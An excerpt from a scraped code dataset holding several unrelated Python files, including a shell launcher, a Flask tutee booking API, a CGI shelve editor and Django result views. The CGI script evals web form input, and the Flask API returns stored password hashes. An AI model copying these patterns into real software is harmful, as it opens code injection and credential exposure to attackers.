"call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "219965436", "text": "\"\"\" A command that starts a shell (aka command prompt). \"\"\"\n\n\nimport os\nimport subprocess\nimport threading\n\nfrom pgv.red.api import Module, Package, PythonNamespace\n\n\nclass StartShell(object):\n \"\"\" Start a new shell at the package containing the the current name. \"\"\"\n\n COMMAND_TEMPLATE = r'start cmd /k \"cd {dirname} & ls\"'\n\n #### 'object' protocol #####################################################\n\n def __call__(self, window):\n \"\"\" Start a new shell at the package containing the current name. \"\"\"\n\n red = window.red\n name = red.name\n\n # I find that I tend to typeahead a dot automatically and it seems nice\n # to just ignore it in terms of command execution.\n if name.endswith('.'):\n name = name[:-1]\n\n # If the current name is empty then do nothing!\n if len(name) > 0:\n node = red.lookup(name)\n if node is not None:\n dirname = self._get_appropriate_directory_for_node(node)\n command = self._get_command(dirname)\n self._run_command_in_new_thread(command)\n\n return\n\n #### Private protocol ######################################################\n\n def _get_appropriate_directory_for_node(self, node):\n \"\"\" Return an appropriate directory for the given node.\n\n If the node is a Package, use the, errr, package directory.\n If the node is a Module use the directory it is in.\n If the node is an Attribute, Function or Klass then use the directory\n that contains the module it is in!\n\n \"\"\"\n\n if isinstance(node, Package):\n dirname = node.filename\n\n elif isinstance(node, Module):\n dirname = os.path.dirname(node.filename)\n\n else:\n dirname = os.path.dirname(node.module.filename)\n\n return dirname\n\n def _get_command(self, dirname):\n \"\"\" Get the command. \"\"\"\n\n command = self.COMMAND_TEMPLATE.format(dirname=dirname)\n\n return command\n\n def _run_command_in_new_thread(self, command):\n \"\"\" Run the given command in a separate thread. 
\"\"\"\n\n thread = threading.Thread(\n None, subprocess.call, args=(command,), kwargs={'shell':True}\n )\n thread.start()\n\n return\n\n#### EOF #######################################################################\n", "sub_path": "source/pgv/red/ui/commands/start_shell.py", "file_name": "start_shell.py", "file_ext": "py", "file_size_in_byte": 2374, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pgv.red.api.Package", "line_number": 51, "usage_type": "argument"}, {"api_name": "pgv.red.api.Module", "line_number": 54, "usage_type": "argument"}, {"api_name": "os.path.dirname", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 72, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "533274301", "text": "import json\nimport sys\nimport os\nimport pika\n\nfrom flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom os import environ\n\nimport requests\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root@localhost:3306/tutee'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nCORS(app)\n\nclass Tutee(db.Model):\n __tablename__ = 'tutee'\n\n tutee_id = db.Column(db.String(64), primary_key = True) #email\n contact_number = db.Column(db.String(8), nullable = False)\n name = db.Column(db.String(64), nullable = False)\n gender = db.Column(db.String(1), nullable = False)\n age = db.Column(db.Integer, nullable = False)\n address = db.Column(db.String(64), nullable = False)\n password_hash = db.Column(db.String(64), nullable = False)\n\n def __init__(self, tutee_id, contact_number, name, gender, age, address, password_hash):\n self.tutee_id = tutee_id\n self.contact_number = contact_number\n self.name = name\n self.gender = gender\n self.age = age\n self.address = address\n self.password_hash = password_hash\n\n def json(self):\n return {\"tutee_id\": self.tutee_id, \"contact_number\": self.contact_number, \n \"name\": self.name, \"gender\": self.gender, \n \"age\": self.age, \"address\": self.address, \n \"password_hash\": self.password_hash}\n\n\n@app.route(\"/tutee\")\ndef get_all():\n return jsonify({\"tutees\": [tutee.json() for tutee in Tutee.query.all()]})\n\n\n@app.route(\"/tutee/\")\ndef find_by_tutee_id(tutee_id):\n tutee = Tutee.query.filter_by(tutee_id=tutee_id).first()\n if tutee:\n return jsonify(tutee.json())\n return jsonify({\"message\": \"Tutee not found\"}), 404\n\n\n@app.route(\"/tutee/\", methods=['POST'])\ndef create_tutee_profile(tutee_id):\n if (Tutee.query.filter_by(tutee_id=tutee_id).first()):\n return jsonify({\"message\": \"A tutee with username '{}' already exists.\".format(tutee_id)}), 400\n\n data = request.get_json() # this json object should not have tutee_id\n tutee = Tutee(tutee_id, **data) # add everything in data\n\n try:\n db.session.add(tutee)\n db.session.commit()\n except:\n return jsonify({\"message\": \"An error occurred registering the tutee.\"}), 500\n\n return jsonify(tutee.json()), 201\n\n\n@app.route(\"/tutee/subject/\")\ndef filter_by_Tutee_subject(subject):\n tutor = Tutor.query.filter_by(subject=subject).first()\n if tutor:\n return 
jsonify({\"Tutor\": [tutor.json() for tutor in Tutor.query.filter_by(subject=subject).all()]})\n return jsonify({\"message\": \"Profile not found.\"}), 404\n\n\n@app.route(\"/tutee/level/\")\ndef filter_by_Tutee_levels(level):\n tutee= Tutee.query.filter_by(level=level).first()\n if tutee:\n return jsonify({\"Tutee\": [tutee.json() for tutee in Tutee.query.filter_by(level=level).all()]})\n return jsonify({\"message\": \"Profile not found.\"}), 404\n\n\n# attritubutes that can be updated:\n# email, contact, name, address, subject_rate\n@app.route(\"/tutee/update/\", methods=['POST'])\ndef update_tutee_profile(tutee_id):\n if (not Tutee.query.filter_by(tutee_id=tutee_id).first()):\n return jsonify({\"message\": \"A tutee with tutee_id '{}' does not exist.\".format(tutee_id)}), 400\n\n data = request.get_json()\n tutee = Tutee.query.filter_by(tutee_id=tutee_id).first()\n\n for key, value in data.items():\n try:\n setattr(tutee, key, value)\n except:\n return jsonify({\"message\": \"An error occurred updating '{}'.\".format(key)}), 500\n db.session.commit()\n\n return jsonify({\"message\": \"Update successful.\"}), 201\n\n\n@app.route(\"/tutee/request\", methods = ['POST'])\ndef create_request():\n \"\"\"Create a new order according to the order_input\"\"\"\n status = 200\n message = \"Success\"\n\n data = request.get_json()\n tutee_id = data[\"tutee_id\"]\n tutor_id = data[\"tutor_id\"]\n subject = data[\"subject\"]\n\n booking_id = tutor_id + subject + tutee_id.split(\"@\")[0]\n json_obj = {\"booking_id\": booking_id, \"tutor_id\": tutor_id, \"subject\": subject, \"tutee_id\": tutee_id}\n\n return send_request(json_obj)\n\n\ndef send_request(request):\n \"\"\"inform Tutor/Booking Management as needed\"\"\"\n hostname = \"localhost\"\n port = 5672 # default messaging port.\n # connect to the broker and set up a communication channel in the connection\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, port=port))\n channel = connection.channel()\n\n # set up the exchange if the exchange doesn't exist\n exchangename=\"tutee_topic\"\n channel.exchange_declare(exchange=exchangename, exchange_type='topic')\n\n # prepare the message body content\n message = json.dumps(request, default=str) # convert a JSON object to a string\n\n channel.queue_declare(queue='booking', durable=True)\n channel.queue_bind(exchange=exchangename, queue='booking', routing_key='#')\n\n channel.basic_publish(exchange=exchangename, routing_key=\"tutee.request\", body=message,\n properties=pika.BasicProperties(delivery_mode = 2) # make message persistent within the matching queues until it is received by some receiver (the matching queues have to exist and be durable and bound to the exchange)\n )\n \n print(\"Order sent to RequestTutor service.\")\n connection.close()\n return jsonify(request), 201\n\nviewbookingsURL = \"http://localhost:5002/booking/tutee/\"\ndef view_bookings(tutee_id):\n tutee_id = json.loads(json.dumps(tutee_id, default=str))\n bookings = requests.post(viewbookingsURL, json = tutee_id)\n #display bookings\n print(bookings)\n\nviewspecificbookingURL = \"http://localhost:5002/booking/\"\ndef view_particular_booking(booking_id):\n booking_id = json.loads(json.dumps(booking_id, default=str))\n booking = requests.post(viewspecificbookingURL, json = booking_id)\n #display bookings\n print(booking)\n\nfilterbookingbystatusURL = \"http://localhost:5002/booking/status//tutee/\"\ndef filter_by_booking_status(status):\n status = json.loads(json.dumps(status, default=str))\n bookings = 
requests.post(filterbookingbystatusURL, json = status)\n    #display bookings\n    print(bookings)\n\nif __name__ == '__main__':\n    app.run(port = 5000, debug = True)\n", "sub_path": "Tutor_System/app/tutee.py", "file_name": "tutee.py", "file_ext": "py", "file_size_in_byte": 6415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 17, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "pika.BlockingConnection", "line_number": 135, "usage_type": "call"}, {"api_name": "pika.ConnectionParameters", "line_number": 135, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 143, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 143, "usage_type": "argument"}, {"api_name": "pika.BasicProperties", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 154, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 158, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 158, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 159, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 165, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 165, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 166, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 172, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 172, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "549919967", "text": "#-*- coding:utf-8 -*-\r\n'''\r\nCreated on 2015-11-23\r\n\r\n@author: 119937\r\n'''\r\n'''\r\nA web-based interface for viewing and updating class instances stored in a shelve;\r\nthe shelve lives on the server (the same machine, when run locally)\r\n'''\r\nimport cgi,shelve,sys,os\r\nshelvename='class-shelve'\r\nfieldnames=('name','age','job','pay')\r\n\r\nform = 
cgi.FieldStorage()\r\nprint('Content-type:text/html')\r\nsys.path.insert(0,os.getcwd())\r\n\r\n# main HTML reply page\r\nreplyhtml=\"\"\"\r\n<html>\r\n<title>People Input Form</title>\r\n<body>\r\n<form method=POST action=\"peoplecgi.py\">\r\n    <table>\r\n    <tr><th>key<td><input type=text name=key value=\"%(key)s\">\r\n    $ROW$\r\n    </table>\r\n    <p>\r\n    <input type=submit value=\"Fetch\" name=action>\r\n    <input type=submit value=\"Update\" name=action>
\r\n</form>\r\n</body></html>\r\n\"\"\"\r\n# HTML for the data rows substituted at $ROW$\r\n\r\nrowhtml = '<tr><th>%s<td><input type=text name=%s value=\"%%(%s)s\">\\n'\r\nrowshtml=''\r\n\r\nfor fieldname in fieldnames:\r\n    rowshtml+=(rowhtml%((fieldname,)*3))\r\nreplyhtml=replyhtml.replace('$ROW$', rowshtml)\r\n\r\ndef htmlize(adict):\r\n    new=adict.copy()\r\n    for field in fieldnames:\r\n        value=new[field]\r\n        new[field]=cgi.escape(repr(value))\r\n    return new\r\n\r\ndef fetchRecord(db,form):\r\n    try:\r\n        key=form['key'].value\r\n        record=db[key]\r\n        fields=record.__dict__\r\n        fields['key']=key\r\n    except:\r\n        fields=dict.fromkeys(fieldnames, '?')\r\n        fields['key']='Missing or invalid key!'\r\n    return fields\r\n\r\ndef updateRecord(db,form):\r\n    if not 'key' in form:\r\n        fields =dict.fromkeys(fieldnames,'?')\r\n        fields['key']='Missing key input!'\r\n    else:\r\n        key=form['key'].value\r\n        if key in db:\r\n            record = db[key]\r\n        else:\r\n            from com.xpython.src2.person import Person\r\n            record=Person(name='?',age='?')\r\n        for field in fieldnames:\r\n            setattr(record,field,eval(form[field].value))\r\n        db[key]=record\r\n        fields=record.__dict__\r\n        fields['key']=key\r\n    return fields\r\ndb=shelve.open(shelvename)\r\naction=form['action'].value if 'action' in form else None\r\nif action=='Fetch':\r\n    fields=fetchRecord(db,form)\r\nelif action=='Update':\r\n    fields=updateRecord(db, form)\r\nelse:\r\n    fields=dict.fromkeys(fieldnames,'?')\r\n    fields['key']='Missing or invalid action'\r\ndb.close()\r\nprint(replyhtml%htmlize(fields))", "sub_path": "src/com/xpython/src2/webapp/peoplecgi.py", "file_name": "peoplecgi.py", "file_ext": "py", "file_size_in_byte": 2278, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "cgi.FieldStorage", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 17, "usage_type": "call"}, {"api_name": "cgi.escape", "line_number": 49, "usage_type": "call"}, {"api_name": "com.xpython.src2.person.Person", "line_number": 73, "usage_type": "call"}, {"api_name": "shelve.open", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "551998895", "text": "from io import StringIO\nfrom os.path import join\n\n\nclass TMoleFile(object):\n    _parser = []\n\n    def __init__(self, directory, filename):\n        self.directory = directory\n        self.filename = filename\n        with open(join(directory, filename)) as f:\n            self.raw = StringIO(f.read())\n\n    def _run_parsers(self):\n        for Parser, kwargs in self.__class__._parser:\n            key = Parser.__name__\n            if key.endswith('Parser'):\n                key = key[:-6]\n            for argname in kwargs:\n                if callable(kwargs[argname]):\n                    kwargs[argname] = kwargs[argname](self)\n            data = Parser(self.raw, **kwargs)._data\n            self.__dict__[key] = data\n", "sub_path": "tmolehelpers/tmole_file.py", "file_name": "tmole_file.py", "file_ext": "py", "file_size_in_byte": 718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "289290140", "text": "import multiprocessing\nimport os\nfrom warnings import simplefilter\n\nsimplefilter(action='ignore', category=FutureWarning)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\nfrom itertools import product\nfrom shutil import rmtree\nfrom psutil import cpu_count\n\nfrom numpy import savetxt\n\nfrom data_gen import data_gen, data_gen_MNIST, data_gen_REAL\n\nfrom model import regession_model\n\n\ndef work(Coordinator, report_lock, loss_function, 
loss_para, data, base_path, repeat=1):\n os.makedirs(base_path)\n Model = regession_model(p=data['p'], K=data['K'], loss_function=loss_function, loss_para=loss_para)\n for r in range(repeat):\n if data['Env'] == 'Sim':\n X, Y = data_gen(Nk=data['Nk'], K=data['K'], p=data['p'], seed=hash(\"Train\" + str(r)))\n TX, TY = data_gen(Nk=data['Nk'], K=data['K'], p=data['p'], seed=hash(\"Test\" + str(r)))\n elif data['Env'] == 'MNIST':\n X, Y = data_gen_MNIST(data['Nk'] * data['K'], False, seed=hash(\"Train\" + str(r)))\n TX, TY = data_gen_MNIST(data['Nk'] * data['K'], True, seed=hash(\"Test\" + str(r)))\n elif data['Env'] == 'REAL':\n X, Y, TX, TY = data_gen_REAL(r)\n res = Model.full_auto(X, Y, TX, TY)\n local_path = os.path.join(base_path, str(r))\n os.makedirs(local_path)\n matrix_to_save = {'Cfm_train', 'Cfm_test', 'A', 'B'}\n for m in matrix_to_save:\n savetxt(os.path.join(local_path, str(m) + \".csv\"), res[m], delimiter=\",\")\n if loss_function == 'DWD' or loss_function == 'DWDSM' or loss_function == 'DWDnc':\n loss_para_pad_to_3 = (loss_para['l'], loss_para['alpha'], loss_para['q'])\n elif loss_function == 'logistic':\n loss_para_pad_to_3 = (loss_para['l'], \"-\", \"-\")\n else:\n raise\n\n settings = (data['K'], data['p'], data['Nk'], loss_function)\n rps = (\n str(r), res['Loss_train'], res['Loss_test'], res['Ac_train'], res['Ac_test'], res['large_parameter'],\n res['i'])\n to_report = list(map(lambda x: str(x), settings + loss_para_pad_to_3 + rps))\n report_lock.acquire()\n print(\",\".join(to_report),\n file=open(os.path.join(os.getcwd(), \"results\", \"env=\" + data['Env'], \"sum.csv\"), 'a'))\n report_lock.release()\n Model.reset()\n Coordinator.release()\n return None\n\n\ndef path_gen(Env, K, p, Nk, loss_function, l, al, q):\n return os.path.join(os.getcwd(), \"results\", \"env=\" + str(Env), \"K=\" + str(K), \"p=\" + str(p),\n \"Nk=\" + str(Nk), \"loss_function=\" + str(loss_function), \"Lambda=\" + str(l),\n \"Alpha=\" + str(al), \"q=\" + str(q))\n\n\nif __name__ == '__main__':\n Env = 'Sim'\n Repeat = 100\n Coordinator = multiprocessing.Semaphore(cpu_count(logical = True)+4)\n rmtree(\"./results\", ignore_errors=True)\n os.makedirs(os.path.join(os.getcwd(), \"results\", \"env=\" + str(Env)))\n Names = (\n \"K\", \"p\", \"Nk\", \"Loss_f\", \"Lambda\", \"Alpha\", \"q\", \"id\", \"Loss_train\", \"Loss_test\", \"Ac_train\", \"Ac_test\",\n \"non_zero\", \"i\")\n print(\",\".join(Names), file=open(os.path.join(os.getcwd(), \"results\", \"env=\" + str(Env), \"sum.csv\"), 'w+'),\n flush=True)\n report_lock = multiprocessing.Lock()\n if Env == 'Sim':\n Env_combination = ((3, 150, 50), (3, 150, 100), (3, 300, 50), (3, 300, 100),\n (5, 150, 50), (5, 150, 100), (5, 300, 50), (5, 300, 100))\n for K, p, Nk in reversed(Env_combination):\n # Logistic\n ls = {0.3, 0.1, 0.06, 0.03, 0.01, 0.006, 0.003, 0.001}\n for l in ls:\n base_path = path_gen(Env, K, p, Nk, \"logistic\", l, \"NA\", \"NA\")\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, 'logistic', {'l': l}, {'Env': 'Sim', 'K': K, 'p': p, 'Nk': Nk}, base_path,\n Repeat)).start()\n # DWD\n ls = {0.06, 0.03, 0.01, 0.006, 0.005, 0.004, 0.003, 0.001, 0.0006}\n als = {0.1, 0.5, 0.9}\n qs = {0.5, 1, 20}\n for dwdv in [\"DWDnc\"]: # ,\"DWDnc\",\"DWDSM\"\n for l, al, q in product(ls, als, qs):\n base_path = path_gen(Env, K, p, Nk, dwdv, l, al, q)\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n # report = work (Coordinator,report_lock, 'DWD', 
{'l':l,'alpha':al,'q':q}, {'K':K,'p':p,'Nk':Nk},base_path,Repeat )\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, dwdv, {'l': l, 'alpha': al, 'q': q},\n {'Env': Env, 'K': K, 'p': p, 'Nk': Nk},\n base_path, Repeat)).start()\n\n elif Env == 'MNIST':\n K = 10\n p = 28 * 28\n for Nk in (50, 100, 200, 700):\n # DWD\n ls = {0.06, 0.03, 0.01, 0.006, 0.005, 0.004, 0.003, 0.001, 0.0006}\n als = {0.1, 0.5, 0.9}\n qs = {0.5, 1, 20}\n for dwdv in [\"DWD\"]: # ,\"DWDnc\",\"DWDSM\"\n for l, al, q in product(ls, als, qs):\n base_path = path_gen(Env, K, p, Nk, dwdv, l, al, q)\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, dwdv, {'l': l, 'alpha': al, 'q': q},\n {'Env': Env, 'K': K, 'p': p, 'Nk': Nk},\n base_path, Repeat)).start()\n # Logistic\n for l in ls:\n base_path = path_gen(Env, K, p, Nk, \"logistic\", l, \"NA\", \"NA\")\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, 'logistic', {'l': l}, {Env: Env, 'K': K, 'p': p, 'Nk': Nk},\n base_path,\n Repeat)).start()\n elif Env == 'REAL':\n K = 4\n p = 1714\n Nk = \"NA\"\n #ls = {3,1,0.6,0.3,0.1,0.06, 0.03, 0.01, 0.006, 0.005, 0.004, 0.003, 0.001, 0.0006,0.0003,0.0001}\n ls = list(map(lambda x: (x)/100,list(range(41))))\n als = {0.1, 0.5, 0.9}\n qs = {0.5, 1, 20}\n for dwdv in [\"DWD\", \"DWDnc\", \"DWDSM\"]: # ,\"DWDnc\",\"DWDSM\"\n for l, al, q in product(ls, als, qs):\n base_path = path_gen(Env, K, p, Nk, dwdv, l, al, q)\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, dwdv, {'l': l, 'alpha': al, 'q': q},\n {'Env': Env, 'K': K, 'p': p, 'Nk': Nk},\n base_path, Repeat)).start()\n # Logistic\n for l in ls:\n base_path = path_gen(Env, K, p, Nk, \"logistic\", l, \"NA\", \"NA\")\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, 'logistic', {'l': l}, {'Env': Env, 'K': K, 'p': p, 'Nk': Nk}, base_path,\n Repeat)).start()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.simplefilter", "line_number": 5, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 19, "usage_type": "call"}, {"api_name": "model.regession_model", "line_number": 20, "usage_type": "call"}, {"api_name": "data_gen.data_gen", "line_number": 23, "usage_type": "call"}, {"api_name": "data_gen.data_gen", "line_number": 24, "usage_type": "call"}, {"api_name": "data_gen.data_gen_MNIST", "line_number": 26, "usage_type": "call"}, {"api_name": "data_gen.data_gen_MNIST", "line_number": 27, "usage_type": "call"}, {"api_name": "data_gen.data_gen_REAL", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 58, "usage_type": "call"}, {"api_name": "multiprocessing.Semaphore", "line_number": 66, "usage_type": "call"}, {"api_name": "psutil.cpu_count", "line_number": 66, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 67, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 72, "usage_type": "call"}, {"api_name": "multiprocessing.Lock", "line_number": 74, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 85, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 93, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 98, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 112, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 116, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 125, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 138, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 142, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 151, "usage_type": "call"}]} +{"seq_id": "63165952", "text": "from django.shortcuts import render, get_object_or_404,get_list_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.db.models import Max\nfrom django.db.models import Q\n\nfrom django.core.files.storage import FileSystemStorage\nfrom chartit import DataPool, Chart\n# Create your views here.\n\nfrom .models import Document, Flows, FlowTemplate, FlowSummary\n\ndef template_upload_handler(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n doctype = request.POST['doctype']\n \n # save file path to DB\n d = Document(path=uploaded_file_url, description=request.POST['description'])\n d.save()\n # save fps template\n d.upload_template(doctype=doctype)\n\n return HttpResponseRedirect(reverse('poc:showtemplate'))\n else:\n return render(request, 'poc/upload_template.html')\n\ndef result_upload_handler(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n doctype = request.POST['doctype']\n description = 'no description' if request.POST['description'] == '' else request.POST['description']\n # save file path to DB\n data = Document(path=uploaded_file_url, description=description, test_set=request.POST['testcase'])\n data.save()\n # calculate result\n if request.POST['service_type'] == 'other':\n try:\n 
data.save_other_service_result(request.POST['testcase'], doctype)\r\n            except:\r\n                return render(request, 'poc/error.html')\r\n        else:\r\n            try:\r\n                data.save_multicast_service_result(request.POST['testcase'], request.POST['service_type'], doctype)\r\n            except:\r\n                return render(request, 'poc/error.html')\r\n        return HttpResponseRedirect(reverse('poc:resultdetail', args=(request.POST['testcase'],)))\r\n    else:\r\n        latest_flow_set = Document.objects.all().aggregate(Max('test_set'))\r\n        return render(request, 'poc/upload_result.html', latest_flow_set) \r\n\r\ndef show_template(request):\r\n    try:\r\n        latest_flow_template = FlowTemplate.objects.all()\r\n        context = {'latest_flow_template': latest_flow_template}\r\n        return render(request, 'poc/flowtemplate.html', context)\r\n    except FlowTemplate.DoesNotExist:\r\n        return render(request, 'poc/flowtemplate.html')\r\n\r\ndef show_result(request,test_set):\r\n    try:\r\n        queried_flow = Flows.objects.filter(test_set=test_set)\r\n        latest_flow = []\r\n        for row in queried_flow:\r\n            latest_flow.append( {'flow_name':row.flow_name, 'tx':row.tx, 'rx':row.rx, 'drop_count':row.drop_count, 'drop_time':row.drop_time, 'id':row.id,\r\n                                 'test_set':row.test_set, 'service_type':row.service_type, 'bg_service':row.bg_service, 'fps':row.fps,\r\n                                 'drop_percent':'N/A' if row.rx <= 0 else round((row.drop_count/row.tx)*100,5)} )\r\n        try:\r\n            desc = Document.objects.filter( ~Q(description='') , test_set=test_set )[0].description\r\n            context = {'latest_flow': latest_flow, 'desc':desc, 'test_set':test_set}\r\n        except IndexError:\r\n            context = {'latest_flow': latest_flow, 'desc':'no description', 'test_set':test_set}\r\n        return render(request, 'poc/result_detail.html', context)\r\n    except Flows.DoesNotExist:\r\n        return render(request, 'poc/result_detail.html')\r\n\r\ndef show_all_results(request):\r\n    try:\r\n        uniq_set = {}\r\n        uniq_list = []\r\n        alltestcases = Document.objects.order_by('test_set').values('test_set','description','remark','uploaded_at').distinct()\r\n        for case in alltestcases:\r\n            if case['test_set'] not in uniq_set:\r\n                uniq_list.append( {'test_set':case['test_set'], 'description':case['description'], 'remark':case['remark'], 'uploaded_at':case['uploaded_at'] } )\r\n                uniq_set[case['test_set']] = True\r\n            else:\r\n                if case['description'].strip() not in uniq_list[-1]['description'].strip():\r\n                    uniq_list[-1]['description'] += ' :: '+case['description'].strip()\r\n                    if len(uniq_list[-1]['description']) > 60:\r\n                        uniq_list[-1]['description'] = uniq_list[-1]['description'][:60] + ' ...'\r\n\r\n        context = {'alltestcases': uniq_list , 'desc':\"All Testcases Results\"}\r\n        return render(request, 'poc/results.html', context)\r\n    except Flows.DoesNotExist:\r\n        return render(request, 'poc/results.html')\r\n\r\n# def show_stat(request):\r\n#     return render(request, 'poc/home.html')\r\n\r\ndef 